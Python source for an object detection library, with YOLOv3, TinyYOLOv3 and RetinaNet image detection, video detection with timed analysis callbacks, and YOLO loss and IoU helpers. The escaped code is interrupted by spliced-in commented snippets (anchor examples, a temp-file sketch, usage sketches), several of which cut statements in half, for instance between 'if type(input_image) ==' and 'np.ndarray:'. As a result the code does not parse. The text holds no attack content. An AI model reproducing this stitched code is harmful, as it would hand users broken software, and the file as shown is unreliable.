\"\"\r\n self.__model = None\r\n self.__model_loaded = False\r\n self.__model_path = \"\"\r\n\r\n def __load_classes(self, path: str) -> List[str]:\r\n with open(path) as f:\r\n unique_classes = [c.strip() for c in f.readlines()]\r\n return unique_classes\r\n\r\n def __load_image_yolo(self, input_image: Union[str, np.ndarray, Image.Image]) -> Tuple[\r\n List[str], List[np.ndarray], torch.Tensor, torch.Tensor]:\r\n allowed_exts = [\"jpg\", \"jpeg\", \"png\"]\r\n fnames = []\r\n original_dims = []\r\n inputs = []\r\n original_imgs = []\r\n if type(input_image) == str:\r\n if os.path.isfile(input_image):\r\n if input_image.rsplit('.')[-1].lower() in allowed_exts:\r\n img = cv.imread(input_image)\r\n else:\r\n raise ValueError(f\"image path '{input_image}' is not found or a valid file\")\r\n elif type(input_image) == np.ndarray:\r\n img = input_image\r\n elif \"PIL\" in str(type(input_image)):\r\n img = np.asarray(input_image)\r\n else:\r\n raise ValueError(f\"Invalid image input format\")\r\n\r\n img_h, img_w, _ = img.shape\r\n\r\n original_imgs.append(np.array(cv.cvtColor(img, cv.COLOR_BGR2RGB)).astype(np.uint8))\r\n original_dims.append((img_w, img_h))\r\n if type(input_image) == str:\r\n fnames.append(os.path.basename(input_image))\r\n else:\r\n fnames.append(\"\")\r\n inputs.append(prepare_image(img, (416, 416)))\r\n\r\n if original_dims:\r\n return (\r\n fnames,\r\n original_imgs,\r\n torch.FloatTensor(original_dims).repeat(1, 2).to(self.__device),\r\n torch.cat(inputs, 0).to(self.__device)\r\n )\r\n raise RuntimeError(\r\n f\"Error loading image.\"\r\n \"\\nEnsure the file is a valid image,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n def __save_temp_img(self, input_image: Union[np.ndarray, Image.Image]) -> str:\r\n\r\n temp_path = os.path.join(\r\n os.path.dirname(os.path.abspath(__file__)),\r\n f\"{str(uuid.uuid4())}.jpg\"\r\n )\r\n if type(input_image) == 
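# Anchors are stored as a flat [w0, h0, w1, h1, ...] list; the detection
# layers pair them up and pick a per-scale subset via anchor masks
# ((6, 7, 8) selects the three largest for the coarsest YOLOv3 head).
# Illustration with the default YOLOv3 anchors above:
anchors = [10, 13, 16, 30, 33, 23, 30, 61, 62, 45, 59, 119, 116, 90, 156, 198, 373, 326]
pairs = [(anchors[i], anchors[i + 1]) for i in range(0, len(anchors), 2)]
print([pairs[i] for i in (6, 7, 8)])  # [(116, 90), (156, 198), (373, 326)]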
np.ndarray:\r\n cv.imwrite(temp_path, input_image)\r\n elif \"PIL\" in str(type(input_image)):\r\n input_image.save(temp_path)\r\n else:\r\n raise ValueError(\r\n f\"Invalid image input. Supported formats are OpenCV/Numpy array, PIL image or image file path\"\r\n )\r\n\r\n return temp_path\r\n\r\n def __load_image_retinanet(self, input_image: str) -> Tuple[List[str], List[torch.Tensor], List[torch.Tensor]]:\r\n\r\n allowed_file_extensions = [\"jpg\", \"jpeg\", \"png\"]\r\n images = []\r\n scaled_images = []\r\n fnames = []\r\n\r\n delete_file = False\r\n if type(input_image) is not str:\r\n input_image = self.__save_temp_img(input_image=input_image)\r\n delete_file = True\r\n\r\n if os.path.isfile(input_image):\r\n if input_image.rsplit('.')[-1].lower() in allowed_file_extensions:\r\n img = read_image(input_image, ImageReadMode.RGB)\r\n images.append(img)\r\n scaled_images.append(img.div(255.0).to(self.__device))\r\n fnames.append(os.path.basename(input_image))\r\n else:\r\n raise ValueError(f\"Input image with path {input_image} not a valid file\")\r\n\r\n if delete_file:\r\n os.remove(input_image)\r\n\r\n if images:\r\n return (fnames, images, scaled_images)\r\n raise RuntimeError(\r\n f\"Error loading image from input.\"\r\n \"\\nEnsure the folder contains images,\"\r\n \" allowed file extensions are .jpg, .jpeg, .png\"\r\n )\r\n\r\n def setModelTypeAsYOLOv3(self):\r\n\r\n self.__anchors = self.__anchors_yolov3\r\n self.__model_type = \"yolov3\"\r\n\r\n def setModelTypeAsTinyYOLOv3(self):\r\n\r\n self.__anchors = self.__anchors_tiny_yolov3\r\n self.__model_type = \"tiny-yolov3\"\r\n\r\n def setModelTypeAsRetinaNet(self):\r\n\r\n self.__anchors = self.__anchors_tiny_yolov3\r\n self.__model_type = \"retinanet\"\r\n\r\n def setModelPath(self, path: str) -> None:\r\n\r\n if os.path.isfile(path):\r\n extension_check(path)\r\n self.__model_path = path\r\n self.__model_loaded = False\r\n else:\r\n raise ValueError(\r\n \"invalid path, path not pointing to a valid file.\"\r\n ) from None\r\n\r\n def useCPU(self):\r\n\r\n self.__device = \"cpu\"\r\n if self.__model_loaded:\r\n self.__model_loaded = False\r\n self.loadModel()\r\n\r\n def loadModel(self) -> None:\r\n\r\n if not self.__model_loaded:\r\n if self.__model_type == \"yolov3\":\r\n self.__model = YoloV3(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes), \\\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"tiny-yolov3\":\r\n self.__model = YoloV3Tiny(\r\n anchors=self.__anchors,\r\n num_classes=len(self.__classes),\r\n device=self.__device\r\n )\r\n elif self.__model_type == \"retinanet\":\r\n\r\n self.__classes = self.__load_classes(\r\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"coco91_classes.txt\"))\r\n\r\n self.__model = torchvision.models.detection.retinanet_resnet50_fpn(\r\n pretrained=False, num_classes=91,\r\n pretrained_backbone=False\r\n )\r\n else:\r\n raise ValueError(\r\n f\"Invalid model type. 
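# The temp-file helper above gives non-path inputs a uuid-named on-disk life
# just long enough for torchvision's read_image, then removes it. Standalone
# sketch of the same pattern (the zero image is a stand-in):
import os
import uuid
import numpy as np
import cv2 as cv

temp_path = f"{uuid.uuid4()}.jpg"
cv.imwrite(temp_path, np.zeros((32, 32, 3), dtype=np.uint8))
try:
    pass  # e.g. read_image(temp_path, ImageReadMode.RGB)
finally:
    os.remove(temp_path)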
Call setModelTypeAsYOLOv3(), setModelTypeAsTinyYOLOv3() or setModelTypeAsRetinaNet to set a model type before loading the model\")\r\n\r\n state_dict = torch.load(self.__model_path, map_location=self.__device)\r\n try:\r\n self.__model.load_state_dict(state_dict)\r\n self.__model_loaded = True\r\n self.__model.to(self.__device).eval()\r\n except:\r\n raise RuntimeError(\"Invalid weights!!!\") from None\r\n\r\n def CustomObjects(self, **kwargs):\r\n\r\n\r\n if not self.__model_loaded:\r\n self.loadModel()\r\n all_objects_str = (obj_label.replace(\" \", \"_\") for obj_label in self.__classes)\r\n all_objects_dict = {}\r\n for object_str in all_objects_str:\r\n all_objects_dict[object_str] = False\r\n\r\n for karg in kwargs:\r\n if karg in all_objects_dict:\r\n all_objects_dict[karg] = kwargs[karg]\r\n else:\r\n raise ValueError(f\" object '{karg}' doesn't exist in the supported object classes\")\r\n\r\n return all_objects_dict\r\n\r\n def detectObjectsFromImage(self,\r\n input_image: Union[str, np.ndarray, Image.Image],\r\n output_image_path: str = None,\r\n output_type: str = \"file\",\r\n extract_detected_objects: bool = False, minimum_percentage_probability: int = 50,\r\n display_percentage_probability: bool = True, display_object_name: bool = True,\r\n display_box: bool = True,\r\n custom_objects: List = None\r\n ) -> Union[\r\n List[List[Tuple[str, float, Dict[str, int]]]], np.ndarray, List[np.ndarray], List[str]]:\r\n\r\n self.__model.eval()\r\n if not self.__model_loaded:\r\n if self.__model_path:\r\n warnings.warn(\r\n \"Model path has changed but pretrained weights in the\"\r\n \" new path is yet to be loaded.\",\r\n ResourceWarning\r\n )\r\n else:\r\n raise RuntimeError(\r\n \"Model path isn't set, pretrained weights aren't used.\"\r\n )\r\n predictions = defaultdict(lambda: [])\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n fnames, original_imgs, input_dims, imgs = self.__load_image_yolo(input_image)\r\n\r\n with torch.no_grad():\r\n output = self.__model(imgs)\r\n\r\n output = get_predictions(\r\n pred=output.to(self.__device), num_classes=len(self.__classes),\r\n nms_confidence_level=self.__nms_score, objectness_confidence=self.__objectness_score,\r\n device=self.__device\r\n )\r\n\r\n if output is None:\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return original_imgs[0], [], []\r\n else:\r\n return original_imgs[0], []\r\n else:\r\n if extract_detected_objects:\r\n return original_imgs[0], []\r\n else:\r\n return []\r\n\r\n \r\n input_dims = torch.index_select(input_dims, 0, output[:, 0].long())\r\n scaling_factor = torch.min(416 / input_dims, 1)[0].view(-1, 1)\r\n output[:, [1, 3]] -= (416 - (scaling_factor * input_dims[:, 0].view(-1, 1))) / 2\r\n output[:, [2, 4]] -= (416 - (scaling_factor * input_dims[:, 1].view(-1, 1))) / 2\r\n output[:, 1:5] /= scaling_factor\r\n\r\n \r\n for idx in range(output.shape[0]):\r\n output[idx, [1, 3]] = torch.clamp(output[idx, [1, 3]], 0.0, input_dims[idx, 0])\r\n output[idx, [2, 4]] = torch.clamp(output[idx, [2, 4]], 0.0, input_dims[idx, 1])\r\n\r\n for pred in output:\r\n pred_label = self.__classes[int(pred[-1])]\r\n if custom_objects:\r\n if pred_label.replace(\" \", \"_\") in custom_objects.keys():\r\n if not custom_objects[pred_label.replace(\" \", \"_\")]:\r\n continue\r\n else:\r\n continue\r\n predictions[int(pred[0])].append((\r\n pred_label,\r\n float(pred[-2]),\r\n {k: v for k, v in zip([\"x1\", \"y1\", \"x2\", \"y2\"], map(int, pred[1:5]))},\r\n ))\r\n elif 
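# CustomObjects above returns a {label: bool} dict over every supported class
# (spaces replaced by underscores) that detectObjectsFromImage then uses as a
# whitelist. Hedged usage sketch -- the weight and image paths are
# placeholders:
detector = ObjectDetection()
detector.setModelTypeAsYOLOv3()
detector.setModelPath("yolov3.pt")  # placeholder weights path
detector.loadModel()
wanted = detector.CustomObjects(person=True, car=True)  # all other labels False
detections = detector.detectObjectsFromImage("image.jpg", custom_objects=wanted)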
self.__model_type == \"retinanet\":\r\n fnames, original_imgs, scaled_images = self.__load_image_retinanet(input_image)\r\n with torch.no_grad():\r\n output = self.__model(scaled_images)\r\n\r\n if output is None:\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return original_imgs[0], [], []\r\n else:\r\n return original_imgs[0], []\r\n else:\r\n if extract_detected_objects:\r\n return original_imgs[0], []\r\n else:\r\n return []\r\n\r\n for idx, pred in enumerate(output):\r\n for id in range(pred[\"labels\"].shape[0]):\r\n if pred[\"scores\"][id] >= self.__objectness_score:\r\n pred_label = self.__classes[pred[\"labels\"][id]]\r\n\r\n if custom_objects:\r\n if pred_label.replace(\" \", \"_\") in custom_objects.keys():\r\n if not custom_objects[pred_label.replace(\" \", \"_\")]:\r\n continue\r\n else:\r\n continue\r\n\r\n predictions[idx].append(\r\n (\r\n pred_label,\r\n pred[\"scores\"][id].item(),\r\n {k: v for k, v in zip([\"x1\", \"y1\", \"x2\", \"y2\"], map(int, pred[\"boxes\"][id]))}\r\n )\r\n )\r\n\r\n \r\n original_input_image = None\r\n output_image_array = None\r\n extracted_objects = []\r\n\r\n if self.__model_type == \"yolov3\" or self.__model_type == \"tiny-yolov3\":\r\n original_input_image = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n if isinstance(output, torch.Tensor):\r\n for pred in output:\r\n percentage_conf = round(float(pred[-2]) * 100, 2)\r\n if percentage_conf < minimum_percentage_probability:\r\n continue\r\n\r\n displayed_label = \"\"\r\n if display_object_name:\r\n displayed_label = f\"{self.__classes[int(pred[-1].item())]} : \"\r\n if display_percentage_probability:\r\n displayed_label += f\" {percentage_conf}%\"\r\n\r\n original_imgs[int(pred[0].item())] = draw_bbox_and_label(pred[1:5].int() if display_box else None,\r\n displayed_label,\r\n original_imgs[int(pred[0].item())]\r\n )\r\n\r\n output_image_array = cv.cvtColor(original_imgs[0], cv.COLOR_RGB2BGR)\r\n\r\n elif self.__model_type == \"retinanet\":\r\n original_input_image = tensor_to_ndarray(original_imgs[0].div(255.0))\r\n original_input_image = cv.cvtColor(original_input_image, cv.COLOR_RGB2BGR)\r\n for idx, pred in predictions.items():\r\n\r\n max_dim = max(list(original_imgs[idx].size()))\r\n\r\n for label, score, bbox in pred:\r\n percentage_conf = round(score * 100, 2)\r\n if percentage_conf < minimum_percentage_probability:\r\n continue\r\n\r\n displayed_label = \"\"\r\n if display_object_name:\r\n displayed_label = f\"{label} :\"\r\n if display_percentage_probability:\r\n displayed_label += f\" {percentage_conf}%\"\r\n\r\n original_imgs[idx] = draw_bounding_boxes_and_labels(\r\n image=original_imgs[idx],\r\n boxes=torch.Tensor([[bbox[\"x1\"], bbox[\"y1\"], bbox[\"x2\"], bbox[\"y2\"]]]),\r\n draw_boxes=display_box,\r\n labels=[displayed_label],\r\n label_color=(0, 0, 255),\r\n box_color=(0, 255, 0),\r\n width=1,\r\n fill=False,\r\n font_size=int(max_dim / 30)\r\n )\r\n\r\n output_image_array = tensor_to_ndarray(original_imgs[0].div(255.0))\r\n output_image_array = cv.cvtColor(output_image_array, cv.COLOR_RGB2BGR)\r\n\r\n \r\n predictions_batch = list(predictions.values())\r\n predictions_list = predictions_batch[0] if len(predictions_batch) > 0 else []\r\n min_probability = minimum_percentage_probability / 100\r\n\r\n if output_type == \"file\":\r\n if output_image_path:\r\n cv.imwrite(output_image_path, output_image_array)\r\n\r\n if extract_detected_objects:\r\n extraction_dir = \".\".join(output_image_path.split(\".\")[:-1]) + \"-extracted\"\r\n 
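# torchvision's RetinaNet returns, per input image, a dict with "boxes"
# ((N, 4) xyxy in input pixels), "labels" (N,) and "scores" (N,), which is why
# the branch above indexes pred["labels"].shape[0] and filters on
# pred["scores"]. Shape check on random weights (slow but self-contained):
import torch
import torchvision

model = torchvision.models.detection.retinanet_resnet50_fpn(
    pretrained=False, num_classes=91, pretrained_backbone=False).eval()
with torch.no_grad():
    out = model([torch.rand(3, 416, 416)])
print(sorted(out[0].keys()))  # ['boxes', 'labels', 'scores']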
os.mkdir(extraction_dir)\r\n count = 0\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n count += 1\r\n extracted_path = os.path.join(\r\n extraction_dir,\r\n \".\".join(os.path.basename(output_image_path).split(\".\")[:-1]) + f\"-{count}.jpg\"\r\n )\r\n obj_bbox = obj_prediction[2]\r\n cv.imwrite(extracted_path, original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"],\r\n obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n\r\n extracted_objects.append(extracted_path)\r\n\r\n elif output_type == \"array\":\r\n if extract_detected_objects:\r\n for obj_prediction in predictions_list:\r\n if obj_prediction[1] >= min_probability:\r\n obj_bbox = obj_prediction[2]\r\n\r\n extracted_objects.append(\r\n original_input_image[obj_bbox[\"y1\"]: obj_bbox[\"y2\"], obj_bbox[\"x1\"]: obj_bbox[\"x2\"]])\r\n else:\r\n raise ValueError(f\"Invalid output_type '{output_type}'. Supported values are 'file' and 'array' \")\r\n\r\n predictions_list = [\r\n {\r\n \"name\": prediction[0], \"percentage_probability\": round(prediction[1] * 100, 2),\r\n \"box_points\": [prediction[2][\"x1\"], prediction[2][\"y1\"], prediction[2][\"x2\"], prediction[2][\"y2\"]]\r\n } for prediction in predictions_list if prediction[1] >= min_probability\r\n ]\r\n\r\n if output_type == \"array\":\r\n if extract_detected_objects:\r\n return output_image_array, predictions_list, extracted_objects\r\n else:\r\n return output_image_array, predictions_list\r\n else:\r\n if extract_detected_objects:\r\n return predictions_list, extracted_objects\r\n else:\r\n return predictions_list\r\n\r\n\r\nclass VideoObjectDetection:\r\n\r\n def __init__(self):\r\n self.__detector = ObjectDetection()\r\n\r\n def setModelTypeAsYOLOv3(self):\r\n self.__detector.setModelTypeAsYOLOv3()\r\n\r\n def setModelTypeAsTinyYOLOv3(self):\r\n self.__detector.setModelTypeAsTinyYOLOv3()\r\n\r\n def setModelTypeAsRetinaNet(self):\r\n self.__detector.setModelTypeAsRetinaNet()\r\n\r\n def setModelPath(self, model_path: str):\r\n extension_check(model_path)\r\n self.__detector.setModelPath(model_path)\r\n\r\n def loadModel(self):\r\n self.__detector.loadModel()\r\n\r\n def useCPU(self):\r\n self.__detector.useCPU()\r\n\r\n def CustomObjects(self, **kwargs):\r\n return self.__detector.CustomObjects(**kwargs)\r\n\r\n def detectObjectsFromVideo(self, input_file_path=\"\", camera_input=None, output_file_path=\"\", frames_per_second=20,\r\n frame_detection_interval=1, minimum_percentage_probability=50, log_progress=False,\r\n display_percentage_probability=True, display_object_name=True, display_box=True,\r\n save_detected_video=True,\r\n per_frame_function=None, per_second_function=None, per_minute_function=None,\r\n video_complete_function=None, return_detected_frame=False, detection_timeout=None,\r\n custom_objects=None):\r\n\r\n if (input_file_path == \"\" and camera_input == None):\r\n raise ValueError(\r\n \"You must set 'input_file_path' to a valid video file, or set 'camera_input' to a valid camera\")\r\n elif (save_detected_video == True and output_file_path == \"\"):\r\n raise ValueError(\r\n \"You must set 'output_video_filepath' to a valid video file name, in which the detected video will be saved. 
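# Whatever the model type, the public return value above is a list of dicts
# filtered by the minimum probability. Sketch of that final mapping with
# illustrative raw predictions:
raw = [("person", 0.9125, {"x1": 10, "y1": 20, "x2": 110, "y2": 220}),
       ("car", 0.31, {"x1": 5, "y1": 5, "x2": 50, "y2": 40})]
min_probability = 0.50
predictions_list = [
    {"name": p[0], "percentage_probability": round(p[1] * 100, 2),
     "box_points": [p[2]["x1"], p[2]["y1"], p[2]["x2"], p[2]["y2"]]}
    for p in raw if p[1] >= min_probability
]
print(predictions_list)  # only the 91.25% "person" entry survives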
If you don't intend to save the detected video, set 'save_detected_video=False'\")\r\n\r\n else:\r\n try:\r\n\r\n output_frames_dict = {}\r\n output_frames_count_dict = {}\r\n\r\n input_video = cv.VideoCapture(input_file_path)\r\n if (camera_input != None):\r\n input_video = camera_input\r\n\r\n output_video_filepath = output_file_path + '.mp4'\r\n\r\n frame_width = int(input_video.get(3))\r\n frame_height = int(input_video.get(4))\r\n output_video = cv.VideoWriter(output_video_filepath, cv.VideoWriter_fourcc(*\"MP4V\"),\r\n frames_per_second,\r\n (frame_width, frame_height))\r\n\r\n counting = 0\r\n\r\n detection_timeout_count = 0\r\n video_frames_count = 0\r\n\r\n while (input_video.isOpened()):\r\n ret, frame = input_video.read()\r\n\r\n if (ret == True):\r\n\r\n video_frames_count += 1\r\n if (detection_timeout != None):\r\n if ((video_frames_count % frames_per_second) == 0):\r\n detection_timeout_count += 1\r\n\r\n if (detection_timeout_count >= detection_timeout):\r\n break\r\n\r\n output_objects_array = []\r\n\r\n counting += 1\r\n\r\n if (log_progress == True):\r\n print(\"Processing Frame : \", str(counting))\r\n\r\n detected_copy = frame.copy()\r\n\r\n check_frame_interval = counting % frame_detection_interval\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n try:\r\n detected_copy, output_objects_array = self.__detector.detectObjectsFromImage(\r\n input_image=frame, output_type=\"array\",\r\n minimum_percentage_probability=minimum_percentage_probability,\r\n display_percentage_probability=display_percentage_probability,\r\n display_object_name=display_object_name,\r\n display_box=display_box,\r\n custom_objects=custom_objects)\r\n except:\r\n None\r\n\r\n output_frames_dict[counting] = output_objects_array\r\n\r\n output_objects_count = {}\r\n for eachItem in output_objects_array:\r\n eachItemName = eachItem[\"name\"]\r\n try:\r\n output_objects_count[eachItemName] = output_objects_count[eachItemName] + 1\r\n except:\r\n output_objects_count[eachItemName] = 1\r\n\r\n output_frames_count_dict[counting] = output_objects_count\r\n\r\n if (save_detected_video == True):\r\n output_video.write(detected_copy)\r\n\r\n if (counting == 1 or check_frame_interval == 0):\r\n if (per_frame_function != None):\r\n if (return_detected_frame == True):\r\n per_frame_function(counting, output_objects_array, output_objects_count,\r\n detected_copy)\r\n elif (return_detected_frame == False):\r\n per_frame_function(counting, output_objects_array, output_objects_count)\r\n\r\n if (per_second_function != None):\r\n if (counting != 1 and (counting % frames_per_second) == 0):\r\n\r\n this_second_output_object_array = []\r\n this_second_counting_array = []\r\n this_second_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - frames_per_second)):\r\n this_second_output_object_array.append(output_frames_dict[aa + 1])\r\n this_second_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_second_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_second_counting[eachItem] = this_second_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_second_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_second_counting:\r\n this_second_counting[eachCountingItem] = int(\r\n this_second_counting[eachCountingItem] / frames_per_second)\r\n\r\n if (return_detected_frame == True):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, 
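# The per-second bookkeeping above averages per-frame object counts over the
# last frames_per_second frames. Standalone arithmetic check with fps = 2:
frames_per_second = 2
last_second_counts = [{"person": 2, "car": 1}, {"person": 2}]
totals = {}
for frame_counts in last_second_counts:
    for name, n in frame_counts.items():
        totals[name] = totals.get(name, 0) + n
avg = {name: int(n / frames_per_second) for name, n in totals.items()}
print(avg)  # {'person': 2, 'car': 0} -- integer division floors rare objects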
this_second_counting_array,\r\n this_second_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_second_function(int(counting / frames_per_second),\r\n this_second_output_object_array, this_second_counting_array,\r\n this_second_counting)\r\n\r\n if (per_minute_function != None):\r\n\r\n if (counting != 1 and (counting % (frames_per_second * 60)) == 0):\r\n\r\n this_minute_output_object_array = []\r\n this_minute_counting_array = []\r\n this_minute_counting = {}\r\n\r\n for aa in range(counting):\r\n if (aa >= (counting - (frames_per_second * 60))):\r\n this_minute_output_object_array.append(output_frames_dict[aa + 1])\r\n this_minute_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_minute_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_minute_counting[eachItem] = this_minute_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_minute_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_minute_counting:\r\n this_minute_counting[eachCountingItem] = int(\r\n this_minute_counting[eachCountingItem] / (frames_per_second * 60))\r\n\r\n if (return_detected_frame == True):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting, detected_copy)\r\n\r\n elif (return_detected_frame == False):\r\n per_minute_function(int(counting / (frames_per_second * 60)),\r\n this_minute_output_object_array, this_minute_counting_array,\r\n this_minute_counting)\r\n\r\n\r\n else:\r\n break\r\n\r\n if (video_complete_function != None):\r\n\r\n this_video_output_object_array = []\r\n this_video_counting_array = []\r\n this_video_counting = {}\r\n\r\n for aa in range(counting):\r\n this_video_output_object_array.append(output_frames_dict[aa + 1])\r\n this_video_counting_array.append(output_frames_count_dict[aa + 1])\r\n\r\n for eachCountingDict in this_video_counting_array:\r\n for eachItem in eachCountingDict:\r\n try:\r\n this_video_counting[eachItem] = this_video_counting[eachItem] + \\\r\n eachCountingDict[eachItem]\r\n except:\r\n this_video_counting[eachItem] = eachCountingDict[eachItem]\r\n\r\n for eachCountingItem in this_video_counting:\r\n this_video_counting[eachCountingItem] = int(this_video_counting[eachCountingItem] / counting)\r\n\r\n video_complete_function(this_video_output_object_array, this_video_counting_array,\r\n this_video_counting)\r\n\r\n input_video.release()\r\n output_video.release()\r\n\r\n if (save_detected_video == True):\r\n return output_video_filepath\r\n\r\n except:\r\n raise ValueError(\r\n \"An error occured. It may be that your input video is invalid. Ensure you specified a proper string value for 'output_file_path' is 'save_detected_video' is not False. \"\r\n \"Also ensure your per_frame, per_second, per_minute or video_complete_analysis function is properly configured to receive the right parameters. 
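# Hedged sketch of wiring the analysis callbacks named in the error message
# above; the parameter order follows the calls in the loop (interval index,
# per-frame detection arrays, per-frame count dicts, averaged counts, plus
# the frame itself when return_detected_frame=True). Paths are placeholders.
def per_second(second, objects_per_frame, counts_per_frame, avg_counts):
    print(f"second {second}: {avg_counts}")

video_detector = VideoObjectDetection()  # assumed configured and loaded
# video_detector.detectObjectsFromVideo(
#     input_file_path="traffic.mp4", output_file_path="traffic_out",
#     frames_per_second=20, per_second_function=per_second)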
\")\r\ndef bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-9):\r\n \r\n box2 = box2.T\r\n\r\n \r\n if x1y1x2y2: \r\n b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]\r\n b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]\r\n else: \r\n b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2\r\n b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2\r\n b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2\r\n b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2\r\n\r\n \r\n inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \\\r\n (torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)\r\n\r\n \r\n w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps\r\n w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps\r\n union = w1 * h1 + w2 * h2 - inter + eps\r\n\r\n iou = inter / union\r\n if GIoU or DIoU or CIoU:\r\n \r\n cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1)\r\n ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) \r\n if CIoU or DIoU: \r\n c2 = cw ** 2 + ch ** 2 + eps \r\n rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +\r\n (b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 \r\n if DIoU:\r\n return iou - rho2 / c2 \r\n elif CIoU: \r\n v = (4 / math.pi ** 2) * \\\r\n torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)\r\n with torch.no_grad():\r\n alpha = v / ((1 + eps) - iou + v)\r\n return iou - (rho2 / c2 + v * alpha) \r\n else: \r\n c_area = cw * ch + eps \r\n return iou - (c_area - union) / c_area \r\n else:\r\n return iou \r\n\r\n\r\ndef compute_loss(loss_layers, targets, device=\"cpu\"):\r\n nc = loss_layers[0].num_classes\r\n nl = len(loss_layers)\r\n \r\n predictions = [layer.pred for layer in loss_layers]\r\n\r\n \r\n lcls, lbox, lobj = torch.zeros(1, device=device), torch.zeros(1, device=device), torch.zeros(1, device=device)\r\n\r\n \r\n tcls, tbox, indices, anchors = build_targets(predictions, targets, loss_layers, device) \r\n\r\n BCEcls = nn.BCEWithLogitsLoss(\r\n pos_weight=torch.tensor([1.0], device=device))\r\n BCEobj = nn.BCEWithLogitsLoss(\r\n pos_weight=torch.tensor([1.0], device=device))\r\n\r\n balance = [4.0, 1.0, 0.4]\r\n\r\n \r\n for layer_index, layer_predictions in enumerate(predictions):\r\n \r\n b, anchor, grid_j, grid_i = indices[layer_index]\r\n \r\n tobj = torch.zeros_like(layer_predictions[..., 0], device=device) \r\n \r\n \r\n \r\n num_targets = b.shape[0]\r\n \r\n if num_targets:\r\n \r\n ps = layer_predictions[b, anchor, grid_j, grid_i]\r\n\r\n \r\n \r\n pxy = ps[:, :2].sigmoid() * 2 - 0.5\r\n \r\n pwh = (ps[:, 2:4].sigmoid() * 2) ** 2 * anchors[layer_index]\r\n \r\n pbox = torch.cat((pxy, pwh), 1)\r\n \r\n iou = bbox_iou(pbox.T, tbox[layer_index], x1y1x2y2=False, CIoU=True)\r\n \r\n lbox += (1.0 - iou).mean() \r\n\r\n \r\n \r\n tobj[b, anchor, grid_j, grid_i] = iou.detach().clamp(0).type(tobj.dtype) \r\n\r\n \r\n \r\n if nc > 1:\r\n \r\n t = torch.full_like(ps[:, 5:], 0.0, device=device) \r\n t[range(num_targets), tcls[layer_index]] = 1\r\n \r\n lcls += BCEcls(ps[:, 5:], t) \r\n\r\n \r\n \r\n obji = BCEobj(layer_predictions[..., 4], tobj) \r\n lobj += obji * balance[layer_index]\r\n\r\n lbox *= 0.05\r\n lobj *= (1.0 * ((416 / 640) ** 2)) \r\n lcls *= (0.5 * (nc / 80)) \r\n\r\n \r\n loss = (lbox + lobj + lcls) * tobj.shape[0]\r\n\r\n return loss, (torch.cat((lbox, lobj, lcls))).detach()\r\n\r\n\r\ndef build_targets(p, targets, loss_layers, device=\"cpu\"):\r\n \r\n na, nt = len(loss_layers[0].anchors), targets.shape[0] \r\n tcls, tbox, indices, anch = [], [], 
